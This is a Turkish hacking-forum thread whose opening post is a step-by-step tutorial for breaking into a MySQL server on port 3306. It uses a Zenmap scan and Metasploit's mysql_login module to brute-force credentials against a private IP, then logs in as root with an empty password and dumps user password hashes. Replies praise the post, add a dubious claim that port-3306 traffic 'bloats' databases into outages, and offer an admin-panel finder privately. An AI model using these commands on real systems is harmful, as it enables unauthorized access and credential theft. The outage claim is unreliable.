THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Hedefe Port'tan (3306) Sızalım!//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
28-10-2019 16:35
#1
Hedefe Port'tan (3306) Sızalım!//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere "Hedefe Port'tan (3306) Sızalım!" konusunu anlatacağım. Konu başlıklarına bir bakalım ardından konumuza geçelim.

Konu Başlıkları
• Port 3306 Nedir?
• Hedefe Port'tan (3306) Sızmak





Port 3306 Nedir?

MySQL servisinin varsayılan olarak kullandığı port numarasıdır.





Hedefe Port'tan (3306) Sızmak

İlk öncelikle hedefimizin IP adresini öğrenelim. IP adresi 192.168.136.130



Saldırgan makineme geçerek Zenmap taraması yaptım ve 3306 portunun açık olduğunu gördüm.



Terminali açarak
Kod:
msfconsole
yazalım.



Ardından MySQL ile ilgili bir exploit var mı diye arama yapacağız. Bunun için
Kod:
search mysql
yazalım.



Gördüğünüz gibi birçok exploit çıktı fakat bizim kullanacağımız exploit auxiliary/scanner/mysql/mysql_login'idir.



Aşağıya gelerek
Kod:
use auxiliary/scanner/mysql/mysql_login
yazalım ve exploit'e giriş yapalım.
Ardından ayarlarına bakmak için
Kod:
 show options
yazalım.
IP adresini ayarlamak için
Kod:
set RHOSTS 192.168.136.130
yazalım.



Bu exploit'de Brute Force(Kaba Kuvvet) saldırısı yapacağımız için User(Kullanıcı adı ve Pass(Şifre) dosyalarını tanıtmamız lazım. Bunun için de
Kod:
set PASS_FILE şifre_dosyasının_uzantısı
ardından
Kod:
set USER_FILE kullanıcı_adı_dosyasının_uzantısı
yazalım ve
Kod:
run
diyelim.



Tarama yaptı ve root: değerlerinin giriş yaptığını buldu. Yani burada root kullanıcı adı ve "boşluk" da şifredir.



Ardından terminale gelerek
Kod:
mysql -h 192.168.136.130 -u root -p
yazalım ve şifreyi istediğin de sadece ENTER tuşuna basalım.
Veritabanına bakmak için
Kod:
show databases;
yazalım.



Buradan mysql'e giriş yapmak için
Kod:
use mysql
diyelim.
Tablolara bakmak için
Kod:
show tables;
yazalım.



User tablosunda ki verilere bakmak için
Kod:
select User, Password from user;
yazalım ve verilere bakalım








Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..








Alıntı:
xMit´isimli üyeden Alıntı Mesajı göster
Evet Etkili Bir port Ekstra olarak ekleyebileceğim bir bilgi 3306 MySQL portu Siber Attaklarda da önemli bir yere sahip öyle ki hedef sistemler üzerine yapılacak 3306 Portlu çıkışlarda hedef sistemin veri tabanında şişmeler meydana gelicek kısa bir süre içerisinde de veri tabanı şişmesinden dolayı siteye erişim kesintisi söz konusu olacaktır .


Başarılar ...



Konu "P4RS tarafından (28-10-2019 19:43 Saat 19:43 ) değiştirilmiştir.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
28-10-2019 19:33
#2
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Güncel
хMít σffícαl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Mesajlar:
1.173
Konular:
111
Teşekkür (Etti):
159
Teşekkür (Aldı):
651
Ticaret:
(0) %
28-10-2019 19:39
#3
Thumbs up
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Evet Etkili Bir port Ekstra olarak ekleyebileceğim bir bilgi 3306 MySQL portu Siber Attaklarda da önemli bir yere sahip öyle ki hedef sistemler üzerine yapılacak 3306 Portlu çıkışlarda hedef sistemin veri tabanında şişmeler meydana gelicek kısa bir süre içerisinde de veri tabanı şişmesinden dolayı siteye erişim kesintisi söz konusu olacaktır .


Başarılar ...
Konu хMít σffícαl tarafından (28-10-2019 19:40 Saat 19:40 ) değiştirilmiştir.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
28-10-2019 20:54
#4
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Alıntı:
xMit´isimli üyeden Alıntı Mesajı göster
Evet Etkili Bir port Ekstra olarak ekleyebileceğim bir bilgi 3306 MySQL portu Siber Attaklarda da önemli bir yere sahip öyle ki hedef sistemler üzerine yapılacak 3306 Portlu çıkışlarda hedef sistemin veri tabanında şişmeler meydana gelicek kısa bir süre içerisinde de veri tabanı şişmesinden dolayı siteye erişim kesintisi söz konusu olacaktır .


Başarılar ...
Konuya ekledim bilgi için sağolasın
Eronmay - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
07/2016
Nereden:
İstanbul
Yaş:
22
Mesajlar:
1.250
Konular:
50
Teşekkür (Etti):
357
Teşekkür (Aldı):
309
Ticaret:
(0) %
28-10-2019 22:35
#5
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Ellerine Sağlık
---------------------
THT Oyuncu Topluluğu Discord Sunucusu

https://discord.gg/Paddtg6


skrosman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2019
Nereden:
System32
Mesajlar:
91
Konular:
13
Teşekkür (Etti):
5
Teşekkür (Aldı):
11
Ticaret:
(0) %
28-10-2019 22:41
#6
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Ellerine sağlık
--------------------- Y A Ş I Y O R U M
orduluMehmet52 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2019
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-10-2019 22:58
#7
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
illa kali linux gerekmiyo haij mi havji mi ne ole de bulursun admin panel bulucu da var bende isteyen özele gelsin verim
orduluMehmet52 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2019
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-10-2019 22:59
#8
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Alıntı:
orduluMehmet52´isimli üyeden Alıntı Mesajı göster
illa kali linux gerekmiyo haij mi havji mi ne ole de bulursun admin panel bulucu da var bende isteyen özele gelsin verim
fakat bu internet sitelerinde olur
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
29-10-2019 17:54
#9
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Alıntı:
Eronmay´isimli üyeden Alıntı Mesajı göster
Ellerine Sağlık
Alıntı:
skrosman´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Alıntı:
orduluMehmet52´isimli üyeden Alıntı Mesajı göster
illa kali linux gerekmiyo haij mi havji mi ne ole de bulursun admin panel bulucu da var bende isteyen özele gelsin verim
Alıntı:
orduluMehmet52´isimli üyeden Alıntı Mesajı göster
fakat bu internet sitelerinde olur
Begenmenize sevindim arkadaşlar, dediginiz gibi Admin panel bulucu site için bu sistem
12yim - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Nereden:
İNTERNET
Mesajlar:
707
Konular:
212
Teşekkür (Etti):
231
Teşekkür (Aldı):
120
Ticaret:
(0) %
29-10-2019 18:11
#10
Cevap: Hedefe Port'tan (3306) Sızalım!//"P4RS
Gene P4RS Gene Muthıs Bı Icerık Ellerınıze Saglık Ilerde BOle Islerle Ugrasırsam Cok Isıme yarayabılırlır ellerınıze saglık
--------------------- My website marianaweb.tr.gg

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler